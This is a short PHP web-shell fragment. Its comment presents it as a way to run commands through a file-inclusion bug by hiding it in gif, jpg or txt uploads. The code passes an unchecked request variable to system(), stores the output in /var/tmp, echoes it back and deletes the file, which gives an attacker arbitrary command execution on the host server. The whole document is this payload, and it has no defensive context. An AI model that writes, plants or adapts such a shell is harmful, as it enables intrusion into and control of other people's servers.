// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt ) if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /var/tmp/nobody 2>&1; cat /var/tmp/nobody; rm /var/tmp/nobody"); $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?>